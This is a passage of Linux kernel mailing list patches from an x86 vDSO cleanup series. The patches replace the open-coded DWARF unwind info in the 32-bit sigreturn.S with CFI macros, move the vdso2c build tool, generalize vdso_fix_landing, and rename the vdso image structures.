+ CFI_OFFSET eax, IA32_SIGCONTEXT_ax
+ CFI_OFFSET ebx, IA32_SIGCONTEXT_bx
+ CFI_OFFSET ecx, IA32_SIGCONTEXT_cx
+ CFI_OFFSET edx, IA32_SIGCONTEXT_dx
+ CFI_OFFSET esp, IA32_SIGCONTEXT_sp
+ CFI_OFFSET ebp, IA32_SIGCONTEXT_bp
+ CFI_OFFSET esi, IA32_SIGCONTEXT_si
+ CFI_OFFSET edi, IA32_SIGCONTEXT_di
+ CFI_OFFSET es, IA32_SIGCONTEXT_es
+ CFI_OFFSET cs, IA32_SIGCONTEXT_cs
+ CFI_OFFSET ss, IA32_SIGCONTEXT_ss
+ CFI_OFFSET ds, IA32_SIGCONTEXT_ds
+ CFI_OFFSET eflags, IA32_SIGCONTEXT_flags
+.endm
+
.text
.globl __kernel_sigreturn
.type __kernel_sigreturn,@function
- nop /* this guy is needed for .LSTARTFDEDLSI1 below (watch for HACK) */
ALIGN
__kernel_sigreturn:
-.LSTART_sigreturn:
- popl %eax /* XXX does this mean it needs unwind info? */
+ STARTPROC_SIGNAL_FRAME IA32_SIGFRAME_sigcontext
+ popl %eax
+ CFI_ADJUST_CFA_OFFSET -4
movl $__NR_sigreturn, %eax
int $0x80
-.LEND_sigreturn:
SYM_INNER_LABEL(vdso32_sigreturn_landing_pad, SYM_L_GLOBAL)
- nop
- .size __kernel_sigreturn,.-.LSTART_sigreturn
+ ud2a
+ CFI_ENDPROC
+ .size __kernel_sigreturn,.-__kernel_sigreturn
.globl __kernel_rt_sigreturn
.type __kernel_rt_sigreturn,@function
ALIGN
__kernel_rt_sigreturn:
-.LSTART_rt_sigreturn:
+ STARTPROC_SIGNAL_FRAME IA32_RT_SIGFRAME_sigcontext
movl $__NR_rt_sigreturn, %eax
int $0x80
-.LEND_rt_sigreturn:
SYM_INNER_LABEL(vdso32_rt_sigreturn_landing_pad, SYM_L_GLOBAL)
- nop
- .size __kernel_rt_sigreturn,.-.LSTART_rt_sigreturn
- .previous
-
- .section .eh_frame,"a",@progbits
-.LSTARTFRAMEDLSI1:
- .long .LENDCIEDLSI1-.LSTARTCIEDLSI1
-.LSTARTCIEDLSI1:
- .long 0 /* CIE ID */
- .byte 1 /* Version number */
- .string "zRS" /* NUL-terminated augmentation string */
- .uleb128 1 /* Code alignment factor */
- .sleb128 -4 /* Data alignment factor */
- .byte 8 /* Return address register column */
- .uleb128 1 /* Augmentation value length */
- .byte 0x1b /* DW_EH_PE_pcrel|DW_EH_PE_sdata4. */
- .byte 0 /* DW_CFA_nop */
- .align 4
-.LENDCIEDLSI1:
- .long .LENDFDEDLSI1-.LSTARTFDEDLSI1 /* Length FDE */
-.LSTARTFDEDLSI1:
- .long .LSTARTFDEDLSI1-.LSTARTFRAMEDLSI1 /* CIE pointer */
- /* HACK: The dwarf2 unwind routines will subtract 1 from the
- return address to get an address in the middle of the
- presumed call instruction. Since we didn't get here via
- a call, we need to include the nop before the real start
- to make up for it. */
- .long .LSTART_sigreturn-1-. /* PC-relative start address */
- .long .LEND_sigreturn-.LSTART_sigreturn+1
- .uleb128 0 /* Augmentation */
- /* What follows are the instructions for the table generation.
- We record the locations of each register saved. This is
- complicated by the fact that the "CFA" is always assumed to
- be the value of the stack pointer in the caller. This means
- that we must define the CFA of this body of code to be the
- saved value of the stack pointer in the sigcontext. Which
- also means that there is no fixed relation to the other
- saved registers, which means that we must use DW_CFA_expression
- to compute their addresses. It also means that when we
- adjust the stack with the popl, we have to do it all over again. */
-
-#define do_cfa_expr(offset) \
- .byte 0x0f; /* DW_CFA_def_cfa_expression */ \
- .uleb128 1f-0f; /* length */ \
-0: .byte 0x74; /* DW_OP_breg4 */ \
- .sleb128 offset; /* offset */ \
- .byte 0x06; /* DW_OP_deref */ \
-1:
-
-#define do_expr(regno, offset) \
- .byte 0x10; /* DW_CFA_expression */ \
- .uleb128 regno; /* regno */ \
- .uleb128 1f-0f; /* length */ \
-0: .byte 0x74; /* DW_OP_breg4 */ \
- .sleb128 offset; /* offset */ \
-1:
-
- do_cfa_expr(IA32_SIGCONTEXT_sp+4)
- do_expr(0, IA32_SIGCONTEXT_ax+4)
- do_expr(1, IA32_SIGCONTEXT_cx+4)
- do_expr(2, IA32_SIGCONTEXT_dx+4)
- do_expr(3, IA32_SIGCONTEXT_bx+4)
- do_expr(5, IA32_SIGCONTEXT_bp+4)
- do_expr(6, IA32_SIGCONTEXT_si+4)
- do_expr(7, IA32_SIGCONTEXT_di+4)
- do_expr(8, IA32_SIGCONTEXT_ip+4)
-
- .byte 0x42 /* DW_CFA_advance_loc 2 -- nop; popl eax. */
-
- do_cfa_expr(IA32_SIGCONTEXT_sp)
- do_expr(0, IA32_SIGCONTEXT_ax)
- do_expr(1, IA32_SIGCONTEXT_cx)
- do_expr(2, IA32_SIGCONTEXT_dx)
- do_expr(3, IA32_SIGCONTEXT_bx)
- do_expr(5, IA32_SIGCONTEXT_bp)
- do_expr(6, IA32_SIGCONTEXT_si)
- do_expr(7, IA32_SIGCONTEXT_di)
- do_expr(8, IA32_SIGCONTEXT_ip)
-
- .align 4
-.LENDFDEDLSI1:
-
- .long .LENDFDEDLSI2-.LSTARTFDEDLSI2 /* Length FDE */
-.LSTARTFDEDLSI2:
- .long .LSTARTFDEDLSI2-.LSTARTFRAMEDLSI1 /* CIE pointer */
- /* HACK: See above wrt unwind library assumptions. */
- .long .LSTART_rt_sigreturn-1-. /* PC-relative start address */
- .long .LEND_rt_sigreturn-.LSTART_rt_sigreturn+1
- .uleb128 0 /* Augmentation */
- /* What follows are the instructions for the table generation.
- We record the locations of each register saved. This is
- slightly less complicated than the above, since we don't
- modify the stack pointer in the process. */
-
- do_cfa_expr(IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_sp)
- do_expr(0, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_ax)
- do_expr(1, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_cx)
- do_expr(2, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_dx)
- do_expr(3, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_bx)
- do_expr(5, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_bp)
- do_expr(6, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_si)
- do_expr(7, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_di)
- do_expr(8, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_ip)
-
- .align 4
-.LENDFDEDLSI2:
+ ud2a
+ CFI_ENDPROC
+ .size __kernel_rt_sigreturn,.-__kernel_rt_sigreturn
.previous
diff --git a/arch/x86/include/asm/dwarf2.h b/arch/x86/include/asm/dwarf2.h
index 302e11b15da8..09c9684d3ad6 100644
--- a/arch/x86/include/asm/dwarf2.h
+++ b/arch/x86/include/asm/dwarf2.h
@@ -20,6 +20,7 @@
#define CFI_RESTORE_STATE .cfi_restore_state
#define CFI_UNDEFINED .cfi_undefined
#define CFI_ESCAPE .cfi_escape
+#define CFI_SIGNAL_FRAME .cfi_signal_frame
#ifndef BUILD_VDSO
/*
diff --git a/arch/x86/kernel/asm-offsets.c b/arch/x86/kernel/asm-offsets.c
index 25fcde525c68..081816888f7a 100644
--- a/arch/x86/kernel/asm-offsets.c
+++ b/arch/x86/kernel/asm-offsets.c
@@ -63,8 +63,14 @@ static void __used common(void)
OFFSET(IA32_SIGCONTEXT_bp, sigcontext_32, bp);
OFFSET(IA32_SIGCONTEXT_sp, sigcontext_32, sp);
OFFSET(IA32_SIGCONTEXT_ip, sigcontext_32, ip);
+ OFFSET(IA32_SIGCONTEXT_es, sigcontext_32, es);
+ OFFSET(IA32_SIGCONTEXT_cs, sigcontext_32, cs);
+ OFFSET(IA32_SIGCONTEXT_ss, sigcontext_32, ss);
+ OFFSET(IA32_SIGCONTEXT_ds, sigcontext_32, ds);
+ OFFSET(IA32_SIGCONTEXT_flags, sigcontext_32, flags);
BLANK();
+ OFFSET(IA32_SIGFRAME_sigcontext, sigframe_ia32, sc);
OFFSET(IA32_RT_SIGFRAME_sigcontext, rt_sigframe_ia32, uc.uc_mcontext);
#endif
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 6 Jan 2026 13:18:39 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
There is no fundamental reason to use the int80_landing_pad symbol to
adjust ip when moving the vdso. If ip falls within the vdso, and the
vdso is moved, we should change the ip accordingly, regardless of mode
or location within the vdso. This *currently* can only happen on 32
bits, but there isn't any reason not to do so generically.
Note that if this is ever possible from a vdso-internal call, then the
user space stack will also needed to be adjusted (as well as the
shadow stack, if enabled.) Fortunately this is not currently the case.
At the moment, we don't even consider other threads when moving the
vdso. The assumption is that it is only used by process freeze/thaw
for migration, where this is not an issue.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/entry/vdso/vma.c | 16 ++++++----------
1 file changed, 6 insertions(+), 10 deletions(-)
diff --git a/arch/x86/entry/vdso/vma.c b/arch/x86/entry/vdso/vma.c
index 8f98c2d7c7a9..e7fd7517370f 100644
--- a/arch/x86/entry/vdso/vma.c
+++ b/arch/x86/entry/vdso/vma.c
@@ -65,16 +65,12 @@ static vm_fault_t vdso_fault(const struct vm_special_mapping *sm,
static void vdso_fix_landing(const struct vdso_image *image,
struct vm_area_struct *new_vma)
{
- if (in_ia32_syscall() && image == &vdso32_image) {
- struct pt_regs *regs = current_pt_regs();
- unsigned long vdso_land = image->sym_int80_landing_pad;
- unsigned long old_land_addr = vdso_land +
- (unsigned long)current->mm->context.vdso;
-
- /* Fixing userspace landing - look at do_fast_syscall_32 */
- if (regs->ip == old_land_addr)
- regs->ip = new_vma->vm_start + vdso_land;
- }
+ struct pt_regs *regs = current_pt_regs();
+ unsigned long ipoffset = regs->ip -
+ (unsigned long)current->mm->context.vdso;
+
+ if (ipoffset < image->size)
+ regs->ip = new_vma->vm_start + ipoffset;
}
static int vdso_mremap(const struct vm_special_mapping *sm,
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 6 Jan 2026 13:18:37 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
It is generally better to build tools in arch/x86/tools to keep host
cflags proliferation down, and to reduce makefile sequencing issues.
Move the vdso build tool vdso2c into arch/x86/tools in preparation for
refactoring the vdso makefiles.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/Makefile | 2 +-
arch/x86/entry/vdso/Makefile | 7 +++----
arch/x86/tools/Makefile | 15 ++++++++++-----
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
5 files changed, 14 insertions(+), 10 deletions(-)
rename arch/x86/{entry/vdso => tools}/vdso2c.c (100%)
rename arch/x86/{entry/vdso => tools}/vdso2c.h (100%)
diff --git a/arch/x86/Makefile b/arch/x86/Makefile
index 1d403a3612ea..9ab7522ced18 100644
--- a/arch/x86/Makefile
+++ b/arch/x86/Makefile
@@ -252,7 +252,7 @@ endif
archscripts: scripts_basic
- $(Q)$(MAKE) $(build)=arch/x86/tools relocs
+ $(Q)$(MAKE) $(build)=arch/x86/tools relocs vdso2c
###
# Syscall table generation
diff --git a/arch/x86/entry/vdso/Makefile b/arch/x86/entry/vdso/Makefile
index 7f833026d5b2..3d9b09f00c70 100644
--- a/arch/x86/entry/vdso/Makefile
+++ b/arch/x86/entry/vdso/Makefile
@@ -38,13 +38,12 @@ VDSO_LDFLAGS_vdso.lds = -m elf_x86_64 -soname linux-vdso.so.1 \
$(obj)/vdso64.so.dbg: $(obj)/vdso.lds $(vobjs) FORCE
$(call if_changed,vdso_and_check)
-HOST_EXTRACFLAGS += -I$(srctree)/tools/include -I$(srctree)/include/uapi -I$(srctree)/arch/$(SUBARCH)/include/uapi
-hostprogs += vdso2c
+VDSO2C = $(objtree)/arch/x86/tools/vdso2c
quiet_cmd_vdso2c = VDSO2C $@
- cmd_vdso2c = $(obj)/vdso2c $< $(<:%.dbg=%) $@
+ cmd_vdso2c = $(VDSO2C) $< $(<:%.dbg=%) $@
-$(obj)/vdso%-image.c: $(obj)/vdso%.so.dbg $(obj)/vdso%.so $(obj)/vdso2c FORCE
+$(obj)/vdso%-image.c: $(obj)/vdso%.so.dbg $(obj)/vdso%.so $(VDSO2C) FORCE
$(call if_changed,vdso2c)
#
diff --git a/arch/x86/tools/Makefile b/arch/x86/tools/Makefile
index 7278e2545c35..39a183fffd04 100644
--- a/arch/x86/tools/Makefile
+++ b/arch/x86/tools/Makefile
@@ -38,9 +38,14 @@ $(obj)/insn_decoder_test.o: $(srctree)/tools/arch/x86/lib/insn.c $(srctree)/tool
$(obj)/insn_sanity.o: $(srctree)/tools/arch/x86/lib/insn.c $(srctree)/tools/arch/x86/lib/inat.c $(srctree)/tools/arch/x86/include/asm/inat_types.h $(srctree)/tools/arch/x86/include/asm/inat.h $(srctree)/tools/arch/x86/include/asm/insn.h $(objtree)/arch/x86/lib/inat-tables.c
-HOST_EXTRACFLAGS += -I$(srctree)/tools/include
-hostprogs += relocs
-relocs-objs := relocs_32.o relocs_64.o relocs_common.o
-PHONY += relocs
-relocs: $(obj)/relocs
+HOST_EXTRACFLAGS += -I$(srctree)/tools/include -I$(srctree)/include/uapi \
+ -I$(srctree)/arch/$(SUBARCH)/include/uapi
+
+hostprogs += relocs vdso2c
+relocs-objs := relocs_32.o relocs_64.o relocs_common.o
+
+always-y := $(hostprogs)
+
+PHONY += $(hostprogs)
+$(hostprogs): %: $(obj)/%
@:
diff --git a/arch/x86/entry/vdso/vdso2c.c b/arch/x86/tools/vdso2c.c
similarity index 100%
rename from arch/x86/entry/vdso/vdso2c.c
rename to arch/x86/tools/vdso2c.c
diff --git a/arch/x86/entry/vdso/vdso2c.h b/arch/x86/tools/vdso2c.h
similarity index 100%
rename from arch/x86/entry/vdso/vdso2c.h
rename to arch/x86/tools/vdso2c.h
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 6 Jan 2026 13:18:35 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
The vdso .so files are named vdso*.so. These structures are binary
images and descriptions of these files, so it is more consistent for
them to have a naming that more directly mirrors the filenames.
It is also very slightly more compact (by one character...) and
simplifies the Makefile just a little bit.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 ++++-------
arch/x86/entry/vdso/Makefile | 8 ++++----
arch/x86/entry/vdso/vma.c | 10 +++++-----
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +++---
arch/x86/kernel/process_64.c | 6 +++---
arch/x86/kernel/signal_32.c | 4 ++--
8 files changed, 23 insertions(+), 26 deletions(-)
diff --git a/arch/x86/entry/syscall_32.c b/arch/x86/entry/syscall_32.c
index a67a644d0cfe..8e829575e12f 100644
--- a/arch/x86/entry/syscall_32.c
+++ b/arch/x86/entry/syscall_32.c
@@ -319,7 +319,7 @@ __visible noinstr bool do_fast_syscall_32(struct pt_regs *regs)
* convention. Adjust regs so it looks like we entered using int80.
*/
unsigned long landing_pad = (unsigned long)current->mm->context.vdso +
- vdso_image_32.sym_int80_landing_pad;
+ vdso32_image.sym_int80_landing_pad;
/*
* SYSENTER loses EIP, and even SYSCALL32 needs us to skip forward
diff --git a/arch/x86/entry/vdso/.gitignore b/arch/x86/entry/vdso/.gitignore
index 37a6129d597b..eb60859dbcbf 100644
--- a/arch/x86/entry/vdso/.gitignore
+++ b/arch/x86/entry/vdso/.gitignore
@@ -1,8 +1,5 @@
# SPDX-License-Identifier: GPL-2.0-only
-vdso.lds
-vdsox32.lds
-vdso32-syscall-syms.lds
-vdso32-sysenter-syms.lds
-vdso32-int80-syms.lds
